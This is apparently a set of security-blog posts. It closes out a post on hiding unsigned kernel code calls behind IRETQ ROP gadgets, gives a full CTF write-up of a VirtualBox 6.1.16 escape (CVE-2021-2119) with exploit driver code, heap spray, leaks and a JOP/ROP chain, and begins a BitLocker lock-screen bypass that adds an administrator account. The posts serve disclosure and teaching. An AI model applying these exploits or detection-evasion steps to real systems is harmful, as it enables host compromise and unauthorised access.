  3. Copy function arguments on to the kernel thread’s stack from the real stack;
  4. Enable interrupts;
  5. Invoke the requested routine (within the same instruction boundary as when interrupts are enabled);
  6. Cleanly return from the routine without generating obvious stack traces (e.g. function pointers);
  7. Load the real stack pointer and disable the interrupt flag, and do so before returning to unsigned code; and
  8. Continue execution, preserving the function’s return value

While somewhat complicated, the callout mechanism can be achieved easily and, to a reasonable degree, portably, using two widely-available ROP gadgets from within the NT kernel.

The Usefulness of IRET(Q)

The constraint of needing to load a new stack pointer, interrupt flag, and instruction pointer within an instruction boundary was immediately satisfied by the IRET instruction.

For those unfamiliar, the IRET (lit. “interrupt return”) instruction is intended to be used by an operating system or executive (here, the NT kernel) to return from an interrupt routine. To support the recognition of an interrupt from any mode of execution, and to generically resume to any mode of execution, the processor will need to (effectively) preserve the instruction pointer, stack pointer, CPL or privilege level (through the CS and SS selectors; and while they have a more general use-case, this is effectively what is preserved on most operating systems with a flat memory model), and RFLAGS register (as interrupts may be liable to modify certain flags).

To report this information to the OS interrupt handler, the CPU will, in a specific order:

  1. Push the SS (stack segment selector) register;
  2. Push the RSP (stack pointer) register;
  3. Push the RFLAGS (arithmetic/system flags) register;
  4. Push the CS (code segment selector) register;
  5. Push the RIP (instruction pointer) register; and, for some exception-class interrupts,
  6. Push an error code which may describe certain interrupt conditions (e.g. a page fault will know if the fault was caused by a non-present page or by a protection violation)

Note that the error code is not important to the CPU and must be accounted for by the interrupt handler. Each operation is an 8-byte push, meaning that, when the interrupt handler is invoked, the stack pointer will point to the preserved RIP value (or to the error code, if one was pushed).

It is hopefully obvious as to how, approximately, the IRET instruction would be implemented:

  1. Pop a value from the stack to retrieve the new instruction pointer (RIP)
  2. Pop a value from the stack to retrieve the new code segment selector (CS)
  3. Pop a value from the stack to retrieve the new arithmetic/system flags register (RFLAGS)
  4. Pop a value from the stack to retrieve the new stack pointer (RSP)
  5. Pop a value from the stack to retrieve the new stack segment selector (SS)

Or, as modeled as a series of pseudo-assembly instructions,

GENERIC_INTERRUPT:

;note that all push and pop operations are 8 bytes (64 bits) wide!
push ss
push rsp
push rflags
push cs
push rip ;return instruction pointer
;optionally, push a zero-extended 4-byte error code. any interrupt which pushes an error code must have its handler add 8 bytes to its stack pointer (discarding the error code) before executing its IRET.

IRET:

pop rip ;pop return instruction pointer into RIP. do not treat this as a series of regular assembly instructions; treat it instead as CPU microcode!
pop cs
pop rflags
pop rsp
pop ss

The callout mechanism uses the IRET instruction to satisfy its constraints, as the desired RFLAGS (which holds the interrupt flag), instruction pointer, and stack pointer can be loaded by the instruction at the same time (within an instruction boundary).
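For readers who prefer a data-structure view, the frame consumed by IRETQ can be modelled in plain C. This is only a software model for illustration; the type and function names are made up here, and nothing in it executes a real IRETQ. The field order follows the pop order listed above, lowest address first.

```c
#include <stdint.h>

/* Layout of the five quadwords IRETQ consumes, lowest address first. */
typedef struct {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
} iret_frame;

/* Minimal model of the register state the frame affects. */
typedef struct {
    uint64_t rip, cs, rflags, rsp, ss;
} cpu_state;

#define RFLAGS_IF (1ULL << 9)   /* interrupt enable flag, bit 9 of RFLAGS */

/* Software model of IRETQ: all five values are replaced in one step. */
void model_iretq(cpu_state *cpu, const iret_frame *frame)
{
    cpu->rip    = frame->rip;
    cpu->cs     = frame->cs;
    cpu->rflags = frame->rflags;
    cpu->rsp    = frame->rsp;
    cpu->ss     = frame->ss;
}

/* Non-zero if the modelled CPU would accept maskable interrupts. */
int interrupts_enabled(const cpu_state *cpu)
{
    return (cpu->rflags & RFLAGS_IF) != 0;
}
```

The point of the model is that the instruction pointer, stack pointer, and interrupt flag all change together; there is no intermediate state in which only some of them have been updated.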

ROP; Chaining It All Together

To reiterate, the callout routine uses IRET to change the instruction pointer, stack pointer, and interrupt flag within the same instruction boundary in order to jump to external procedures with the interrupt flag enabled. This must be done within an instruction boundary to prevent unfortunately-timed external interrupts from being received just before the external procedure call.

It, however, must also be able to return from the external procedure call without leaving unsigned code pointers on the kernel stack; furthermore, it must also not rely on unlikely/unaligned ROP gadgets (e.g. a cli;ret sequence) which may not exist on future NT kernel builds. Thus also required is an IRET instruction to be executed upon the routine’s completion.

It must be recognized that the nature of the IRET instruction is such that the return instruction pointer is located on the stack. However, it is also recognized that a new stack pointer is loaded. We can therefore use IRET to load the callout thread’s real stack, with the stack pointer pointing to the actual return address.

This eliminates the problem of code pointers being present in the kernel stack; the return address back to our thread’s execution is located on another stack loaded by IRET and which isn’t obviously visible on a stack trace. To facilitate this, the stack frame loaded by the IRET gadget must be such that the return instruction pointer simply points to a RET instruction.

So, the ideal stack frame when calling an external procedure is as such:

  1. IRET return data, where the return address is the address of a RET instruction within ntoskrnl.exe (or any region of signed code), and where the stack pointer to load is the thread’s real stack, which would have a return address pushed on to it; and
  2. The address of an IRET instruction within a region of signed code

Within most, if not all, versions of ntoskrnl.exe, this can be achieved with a simple RET instruction (0xC3 byte); along with the following gadget:

mov rsp, rbp
mov rbp, [rbp + some_offset] ;where some_offset could be liable to change
add rsp, some_other_offset
iretq

This also slightly modifies the mechanism of the ROP chain in that it must also load a pointer to the desired IRET frame in RBP when calling the function. Thankfully, the x64 calling convention specifies the RBP register as non-volatile, or unchanging across function calls, meaning that we can initialize it with our desired pointer when invoking the external procedure. It also means that the callout mechanism is permitted to allocate a non-paged region of memory to be given in RBP, preventing it from having to keep an IRET frame on the kernel stack. Note, of course, the potential for an awful race condition: if an interrupt is received between the mov rsp, rbp and iretq instructions, the stack pointer may point to memory that is insufficient for stack operations.

In having the external procedure return to the above IRET gadget, we can easily return to our unsigned code without ever leaking unsigned code pointers on the kernel stack.

Implementation

An example implementation of the callout mechanism can be found here.

Escaping VirtualBox 6.1: Part 1

14 January 2021 at 23:00

This post is about a VirtualBox escape for the latest currently available version (VirtualBox 6.1.16 on Windows). The vulnerabilities were discovered and exploited by our team Sauercl0ud as part of the RealWorld CTF 2020/2021.

The vulnerability was known to the organizers, requires the guest to be able to insert kernel modules and isn’t exploitable on default configurations of VirtualBox so the impact is very limited.

Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.

Let’s get to some pwning :D

Discovering the Vulnerability

The challenge description already hints at where a bug might be:

Goal:

Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.

You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.

But you can’t do anything in the host, including modifying the guest configuration file, etc.

Hint: SCSI controller is enabled and marked as bootable.

Environment:

In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:

  • VirtualBox:6.1.16-140961-Win_x64.
  • Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
  • Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.

The only special thing about the VM is that the SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.

Here are the operations the SCSI device supports:

// /src/VBox/Devices/Storage/DevBusLogic.cpp
    
    // [...]

    if (fBootable)
    {
        /* Register I/O port space for BIOS access. */
        rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
                                           buslogicR3BiosIoPortWrite,       // Write a byte
                                           buslogicR3BiosIoPortRead,        // Read a byte
                                           buslogicR3BiosIoPortWriteStr,    // Write a string
                                           buslogicR3BiosIoPortReadStr,     // Read a string
                                           NULL /*pvUser*/,
                                           "BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
        // [...]
    }
    // [...]

The SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.

While auditing the vboxscsiReadString function, tsuro and spq found something interesting:

// src/VBox/Devices/Storage/VBoxSCSI.cpp

/**
 * @retval VINF_SUCCESS
 */
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
                       uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
    RT_NOREF(pDevIns);
    LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
                 pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

    /*
     * Check preconditions, fall back to non-string I/O handler.
     */
    Assert(*pcTransfers > 0);

    /* Read string only valid for data in register. */
    AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

    /* Accesses without a valid buffer will be ignored. */
    AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

    /* Check state. */
    AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
    Assert(!pVBoxSCSI->fBusy);

    RTCritSectEnter(&pVBoxSCSI->CritSect);
    /*
     * Also ignore attempts to read more data than is available.
     */
    uint32_t cbTransfer = *pcTransfers * cb;
    if (pVBoxSCSI->cbBufLeft > 0)
    {
        Assert(cbTransfer <= pVBoxSCSI->cbBuf);     // --- [1] ---
        if (cbTransfer > pVBoxSCSI->cbBuf)
        {
            memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
            cbTransfer = pVBoxSCSI->cbBuf;  /* Ignore excess data (not supposed to happen). */
        }

        /* Copy the data and adance the buffer position. */
        memcpy(pbDst, 
               pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf,  // --- [2] ---
               cbTransfer);

        /* Advance current buffer position. */
        pVBoxSCSI->iBuf      += cbTransfer;
        pVBoxSCSI->cbBufLeft -= cbTransfer;         // --- [3] ---

        /* When the guest reads the last byte from the data in buffer, clear
           everything and reset command buffer. */

        if (pVBoxSCSI->cbBufLeft == 0)              // --- [4] ---
            vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
    }
    else
    {
        AssertFailed();
        memset(pbDst, 0, cbTransfer);
    }
    *pcTransfers = 0;
    RTCritSectLeave(&pVBoxSCSI->CritSect);

    return VINF_SUCCESS;
}

We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]. Then, it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3] and if that remaining size hits zero [4], it will reset the SCSI device and require the user to reinitiate the state machine before reading any more bytes.

So much for the logic, but what’s the issue here? There is a check at [1] that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1] won’t bail out, since 2 is less than the buffer size of 40; however, we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3] to underflow: cbBufLeft goes from 1 to 1 - 2, which wraps around to UINT32_MAX. This same cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.
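The arithmetic is easy to reproduce outside of VirtualBox. The sketch below models only the three counters involved; `scsi_model` and the `model_*` functions are invented for this illustration, the memcpy and the reset at [4] are left out, and `model_read_checked` is just one possible stricter check, not the vendor's actual patch.

```c
#include <stdint.h>
#include <stdbool.h>

/* Simplified stand-in for the three fields the read path touches. */
typedef struct {
    uint32_t cbBuf;      /* total buffer size */
    uint32_t iBuf;       /* current position  */
    uint32_t cbBufLeft;  /* bytes remaining   */
} scsi_model;

void model_init(scsi_model *s, uint32_t size)
{
    s->cbBuf = size;
    s->iBuf = 0;
    s->cbBufLeft = size;
}

/* Mirrors the flawed logic: the request is clamped against cbBuf, not cbBufLeft. */
void model_read_buggy(scsi_model *s, uint32_t cbTransfer)
{
    if (s->cbBufLeft == 0)
        return;
    if (cbTransfer > s->cbBuf)
        cbTransfer = s->cbBuf;
    s->iBuf      += cbTransfer;
    s->cbBufLeft -= cbTransfer;   /* wraps when cbTransfer > cbBufLeft */
}

/* One possible stricter variant (an assumption, not the vendor's patch). */
bool model_read_checked(scsi_model *s, uint32_t cbTransfer)
{
    if (cbTransfer > s->cbBufLeft)
        return false;
    s->iBuf      += cbTransfer;
    s->cbBufLeft -= cbTransfer;
    return true;
}
```

Running the 40-byte example through `model_read_buggy` (a read of 39 followed by a read of 2) leaves `iBuf` at 41 and `cbBufLeft` at `UINT32_MAX`, while `model_read_checked` rejects the second read and leaves the state untouched.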

Getting OOB read/write

We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.

Here’s how we triggered the bug:

void exploit() {
    static const uint8_t cdb[1] = {0};
    static const short port = 0x434;
    static const uint32_t buffer_size = 1024;

    // reset the state machine
    __outbyte(port+3, 0);

    // initiate a write operation
    __outbyte(port+0, 0); // TargetDevice (0)
    __outbyte(port+0, 1); // direction (to device)
    
    __outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
    __outbyte(port+0, buffer_size);                                        // buffer length low
    __outbyte(port+0, buffer_size >> 8);                                   // buffer length mid
    
    for(int i = 0; i < sizeof(cdb); i++)
        __outbyte(port+0, cdb[i]);


    // move the buffer pointer to 8 bytes past the end of the buffer; the remaining-bytes counter wraps to -8
    uint8_t buf[buffer_size];
    __inbytestring(port+1, buf, buffer_size - 1);   // Read bufsize-1
    __inbytestring(port+1, buf, 9);                 // Read 9 more bytes

    // fill the scratch buffer with a recognizable marker
    for(int i = 0; i < sizeof(buf); i += 4)
        *((uint32_t*)(&buf[i])) = 0xdeadbeef;
    // repeatedly write the marker out of bounds, starting 8 bytes past the allocation
    for(int i = 0; i < 10000; i++)
        __outbytestring(port+1, buf, sizeof(buf));
}

The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 bytes in order to have the buffer pointer 8-byte aligned after the overflow. Finally, we overwrite the next 10000 KB after our allocated buffer+8 with 0xdeadbeef.
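The three size bytes in the trigger code are a little cryptic, so here is the same bit-packing pulled out into a standalone helper. The `size_bytes` type and both function names are invented for this sketch. `decode_size` is simply the mathematical inverse of the encoding used in the exploit; how the device itself reassembles the value is not shown in this post.

```c
#include <stdint.h>

/* The three bytes the exploit writes after the direction byte. */
typedef struct {
    uint8_t hi_and_cdb;  /* bits 7..4: size bits 19..16, bits 3..0: CDB length */
    uint8_t low;         /* size bits 7..0  */
    uint8_t mid;         /* size bits 15..8 */
} size_bytes;

/* Packs a buffer size and CDB length the same way the trigger code does. */
size_bytes encode_size(uint32_t buffer_size, uint8_t cdb_len)
{
    size_bytes b;
    b.hi_and_cdb = (uint8_t)(((buffer_size >> 12) & 0xf0) | (cdb_len & 0xf));
    b.low        = (uint8_t)(buffer_size & 0xff);
    b.mid        = (uint8_t)((buffer_size >> 8) & 0xff);
    return b;
}

/* Inverse of encode_size, shown only to make the bit layout explicit. */
uint32_t decode_size(size_bytes b)
{
    return ((uint32_t)(b.hi_and_cdb & 0xf0) << 12)
         | ((uint32_t)b.mid << 8)
         | b.low;
}
```

For the 1024-byte buffer used above with a one-byte CDB, this yields the bytes 0x01, 0x00 and 0x04, in the order they are written to the port.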

After loading this driver in the win7 guest, this is what we get:

As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req struct via an IOCTL:

enum operations {
    OPERATION_OUTBYTE = 0,
    OPERATION_INBYTE = 1,
    OPERATION_OUTSTR = 2,
    OPERATION_INSTR = 3,
};

typedef struct {
    volatile unsigned int port;
    volatile unsigned int operation;
    volatile unsigned int data_byte_out;
} Req;

This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).

The bug gives us a linear heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!

Leaking VBoxC.dll and heap addresses

We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.

This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:

  1. Contains a pointer into a dll
  2. Contains a heap address
  3. (Contains some kind of function pointer which might get useful later on)

After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s its (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:

class HGCMMsgCall: public HGCMMsgHeader
{
    // A list of parameters including a 
    // char[] with controlled contents
    VBOXHGCMSVCPARM *paParms;
    
    // [...]
};

class HGCMMsgHeader: public HGCMMsgCore
{
    public:
        // [...]
        /* Port to be informed on message completion. */
        PPDMIHGCMPORT pHGCMPort;
};

typedef struct PDMIHGCMPORT
{
    // [...]
    /**
     * Checks if @a pCmd was cancelled.
     *
     * @returns true if cancelled, false if not.
     * @param   pInterface          Pointer to this interface.
     * @param   pCmd                The command we're checking on.
     */
    DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
    // [...]

} PDMIHGCMPORT;

class HGCMMsgCore : public HGCMReferencedObject
{
    private:
        // [...]
        /** Next element in a message queue. */
        HGCMMsgCore *m_pNext;
        /** Previous element in a message queue.
         *  @todo seems not necessary. */
        HGCMMsgCore *m_pPrev;
        // [...]
};

It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev) because HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.

Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.

Calling niklas’ wait_prop function will allocate a HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.

Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:

  1. We iterate 64 times
  2. Each time we create a client and spray 16 HGCMMsgCalls

That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.

First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall and read the first quad-word of said object. The VTable points into VBoxC.dll so we can use this leak to calculate the base address of VBoxC.dll for future use.
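The base address calculation itself is a single subtraction. In the sketch below, `EXAMPLE_VTABLE_RVA` is a made-up placeholder: the real offset of the vtable inside VBoxC.dll depends on the exact build and is not given in this post. The alignment check relies on Windows loading images on 64 KiB boundaries.

```c
#include <stdint.h>

/* Hypothetical offset of the HGCMMsgCall vtable from the module base; the real
   value depends on the exact VBoxC.dll build and is not given in the text. */
#define EXAMPLE_VTABLE_RVA 0x123450ULL

/* Subtracts the vtable's offset inside the image from the leaked pointer. */
uint64_t module_base_from_vtable(uint64_t leaked_vtable, uint64_t vtable_rva)
{
    return leaked_vtable - vtable_rva;
}

/* DLL images are loaded on 64 KiB boundaries, which gives a cheap sanity check. */
int plausible_image_base(uint64_t base)
{
    return (base & 0xFFFFULL) == 0;
}
```

If the computed base is not 64 KiB aligned, the leaked quad-word was probably not the vtable pointer we were looking for, or the offset belongs to a different build.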

Getting the heap leak is not as straightforward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object but we don’t have any clue about where that object is located relative to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to its next neighbor B.

This works because of this property:

addr(B) - addr(A) == A->m_pNext - B->m_pPrev

To get the address of B, we have to do the following:

  1. Read object A and save the pointers
  2. Take note of how many bytes we had to read until we found the next object B in a variable x
  3. Read object B and save the pointers
  4. If A->m_pNext - B->m_pPrev == x we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects

This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.
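The matching step can be written down in a few lines. The sketch below works on pointer values that have already been read out of the leak; `leaked_links` and `resolve_neighbour` are names invented for this illustration and do not come from our exploit code.

```c
#include <stdint.h>
#include <stdbool.h>

/* The two list pointers read out of one sprayed object via the OOB read. */
typedef struct {
    uint64_t m_pNext;
    uint64_t m_pPrev;
} leaked_links;

/* x is the byte distance between where A and B were found in the leak.
   Returns true and stores B's address if A and B look like list neighbours. */
bool resolve_neighbour(leaked_links a, leaked_links b, uint64_t x, uint64_t *addr_b)
{
    if (a.m_pNext - b.m_pPrev != x)
        return false;
    *addr_b = a.m_pNext;
    return true;
}
```

A match is only "most likely" correct, as noted in step 4: two unrelated objects could satisfy the equation by coincidence, so treating the result as a candidate and cross-checking it against further objects is a reasonable precaution.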

Getting RIP control

Remember those pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… :P

There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled field.

/**
 * @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
 */
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
    HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
    AssertPtrReturn(pMsgHdr, false);

    PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
    AssertPtrReturn(pCmd, false);

    PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort;   // We corrupted pHGCMPort
    AssertPtrReturn(pHgcmPort, false);

    return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd);   // --- Profit ---
}

Internally, svcHlpIsCallCancelled will load pHgcmPort into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt m_pfnCallback with 0x0000000041414141:

Code execution

At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP (Jump-Oriented Programming).

JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.

Sounds easy enough, let’s see what we can come up with :P

Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.
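Locating the magic value in the leaked data is a plain linear search. The sketch below assumes the dump is already in a local buffer and that the string starts on an 8-byte boundary relative to the start of the dump; both function names are invented for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset of the first 8-byte-aligned occurrence of magic, or -1. */
ptrdiff_t find_magic(const uint8_t *dump, size_t len, uint64_t magic)
{
    for (size_t off = 0; off + sizeof(magic) <= len; off += 8) {
        uint64_t value;
        memcpy(&value, dump + off, sizeof(value));  /* avoids unaligned access */
        if (value == magic)
            return (ptrdiff_t)off;
    }
    return -1;
}

/* With a known address for the start of the dump, the string's address follows. */
uint64_t address_of_match(uint64_t dump_base, ptrdiff_t offset)
{
    return dump_base + (uint64_t)offset;
}
```

The offset of the match tells us how far to advance the OOB write before overwriting the remaining 0x68 bytes, and combined with the heap leak it gives the absolute address to reference from the JOP chain.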

After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so CSS wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.

Let’s assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:

We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll’s IAT. The IAT is comparable to a global offset table on Linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec which will pop a calculator.

However, there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out that WinExec sets up a rather large stack frame and the distance between our fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section which has weak randomisation and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax it will set the stack pointer to 0x10000000 before calling WinExec, thereby giving it enough space to do all the stack setup it likes ;)

Demo

‘nuff said! Here’s the demo:

You can find this version of our exploit here.

Credits

Writing this exploit was a joint effort of a bunch of people.

  • ESPR’s spq, tsuro and malle who don’t need an introduction :D

  • My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo

  • niklasb for his prior work and for some helpful pointers!

“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”

~ Niklas Baumstark (2021)

  • myself, Ilias Morad aka A2nkF :)

I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you :D

Conclusion

This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of VirtualBox with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox. We recommend you disable SCSI on your VirtualBox until this bug is patched.

The Organizers even agreed to demo our exploit in a live stream on their twitch channel afterwards and after some offset issues we finally got everything working!

I’d like to thank ChenNan again for creating the challenge and RealWorld CTF for being the excellent CTF we all grew to love. I’m looking forward to next year’s edition, where we hopefully will have an on-site finale in China again :).

This exploit was assigned CVE-2021-2119.

Part two…

This was the initial version of our exploit and it turned out to have a couple of issues which caused it to be a little fragile and somewhat unreliable. After the CTF was over we got together once more and attempted to identify and mitigate these weaknesses. localo will explain these issues and our workarounds in part two of this post (coming soon!).

Stay safe and happy pwning!

BitLocker Lockscreen bypass

By: Jonas L
15 January 2021 at 23:00

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account can be added by doing the following:

  • At the sign-in screen, select “I have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password “hax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the “I have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash Shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible, with the correct timing. The easiest way to learn it is to keep clicking the link roughly 2 times a second. The sticky keys window will disappear. Keep clicking! You will now see a focus box drawn in the middle of the screen. That is the Settings app, and you have to stop clicking when it gets focus.

